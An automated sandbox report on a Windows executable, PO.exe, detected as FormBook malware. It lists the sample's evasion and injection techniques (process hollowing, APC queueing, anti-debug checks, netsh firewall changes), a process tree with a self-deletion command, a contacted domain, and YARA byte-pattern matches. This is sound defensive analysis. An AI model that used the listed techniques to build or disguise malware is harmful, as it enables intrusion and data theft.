Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO.exe

Overview

General Information

Sample Name:PO.exe
Analysis ID:321086
MD5:1a278a89f8176f9d38a04f4e58a8c072
SHA1:50beebd33a8b68602632e1ec065cc6e3b70b40ea
SHA256:73a8ac37a0f0c6761800a276b77b0fd34d1cf43830f822ef18ff50dbda934751
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO.exe (PID: 3064 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: 1A278A89F8176F9D38A04F4E58A8C072)
    • PO.exe (PID: 5820 cmdline: C:\Users\user\Desktop\PO.exe MD5: 1A278A89F8176F9D38A04F4E58A8C072)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 6964 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 7052 cmdline: /c del 'C:\Users\user\Desktop\PO.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 4456 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 1204 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.PO.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.PO.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.PO.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
        3.2.PO.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.PO.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: PO.exeAvira: detected
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO.exeVirustotal: Detection: 38%Perma Link
          Source: PO.exeReversingLabs: Detection: 10%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PO.exeJoe Sandbox ML: detected
          Source: 3.2.PO.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: unknownDNS traffic detected: queries for: www.novavitarealty.com
          Source: explorer.exe, 00000006.00000000.299457272.000000000F5C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000006.00000002.484389821.0000000001398000.00000004.00000020.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: netsh.exe, 00000010.00000002.491969634.000000000432F000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041A060 NtClose,3_2_0041A060
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041A110 NtAllocateVirtualMemory,3_2_0041A110
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00419F30 NtCreateFile,3_2_00419F30
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00419FE0 NtReadFile,3_2_00419FE0
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041A05B NtClose,3_2_0041A05B
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041A10A NtAllocateVirtualMemory,3_2_0041A10A
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00419F2B NtCreateFile,3_2_00419F2B
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00419FDA NtReadFile,3_2_00419FDA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709710 NtQueryInformationToken,LdrInitializeThunk,16_2_03709710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709FE0 NtCreateMutant,LdrInitializeThunk,16_2_03709FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709780 NtMapViewOfSection,LdrInitializeThunk,16_2_03709780
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709A50 NtCreateFile,LdrInitializeThunk,16_2_03709A50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037096E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_037096E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037096D0 NtCreateKey,LdrInitializeThunk,16_2_037096D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709540 NtReadFile,LdrInitializeThunk,16_2_03709540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_03709910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037095D0 NtClose,LdrInitializeThunk,16_2_037095D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037099A0 NtCreateSection,LdrInitializeThunk,16_2_037099A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709860 NtQuerySystemInformation,LdrInitializeThunk,16_2_03709860
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709840 NtDelayExecution,LdrInitializeThunk,16_2_03709840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709770 NtSetInformationFile,16_2_03709770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0370A770 NtOpenThread,16_2_0370A770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709760 NtOpenProcess,16_2_03709760
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709730 NtQueryVirtualMemory,16_2_03709730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0370A710 NtOpenProcessToken,16_2_0370A710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709B00 NtSetValueKey,16_2_03709B00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0370A3B0 NtGetContextThread,16_2_0370A3B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037097A0 NtUnmapViewOfSection,16_2_037097A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709670 NtQueryInformationProcess,16_2_03709670
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709660 NtAllocateVirtualMemory,16_2_03709660
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709650 NtQueryValueKey,16_2_03709650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709A20 NtResumeThread,16_2_03709A20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709610 NtEnumerateValueKey,16_2_03709610
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709A10 NtQuerySection,16_2_03709A10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709A00 NtProtectVirtualMemory,16_2_03709A00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709A80 NtOpenDirectoryObject,16_2_03709A80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709560 NtWriteFile,16_2_03709560
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709950 NtQueueApcThread,16_2_03709950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0370AD30 NtSetContextThread,16_2_0370AD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709520 NtWaitForSingleObject,16_2_03709520
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037095F0 NtQueryInformationFile,16_2_037095F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037099D0 NtCreateProcessEx,16_2_037099D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0370B040 NtSuspendThread,16_2_0370B040
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03709820 NtEnumerateKey,16_2_03709820
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037098F0 NtReadVirtualMemory,16_2_037098F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037098A0 NtWriteVirtualMemory,16_2_037098A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DCA060 NtClose,16_2_02DCA060
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DC9FE0 NtReadFile,16_2_02DC9FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DC9F30 NtCreateFile,16_2_02DC9F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DCA05B NtClose,16_2_02DCA05B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DC9FDA NtReadFile,16_2_02DC9FDA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DC9F2B NtCreateFile,16_2_02DC9F2B
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041D1733_2_0041D173
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041DB483_2_0041DB48
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041D4FF3_2_0041D4FF
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041DD043_2_0041DD04
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00402D883_2_00402D88
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00409E403_2_00409E40
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041E79E3_2_0041E79E
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_007391163_2_00739116
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0068035A3_2_0068035A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FEBB016_2_036FEBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E6E3016_2_036E6E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03791D5516_2_03791D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C0D2016_2_036C0D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036E412016_2_036E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CF90016_2_036CF900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DD5E016_2_036DD5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F258116_2_036F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D841F16_2_036D841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0378100216_2_03781002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F20A016_2_036F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DB09016_2_036DB090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DB9E4016_2_02DB9E40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DCE79E16_2_02DCE79E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DB2FB016_2_02DB2FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DB2D9016_2_02DB2D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DB2D8816_2_02DB2D88
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 036CB150 appears 35 times
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 1204
          Source: PO.exeBinary or memory string: OriginalFilename vs PO.exe
          Source: PO.exe, 00000003.00000003.267458022.00000000011CF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000003.00000002.316029296.0000000002F4C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs PO.exe
          Source: PO.exe, 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecdcd aaa.exe2 vs PO.exe
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
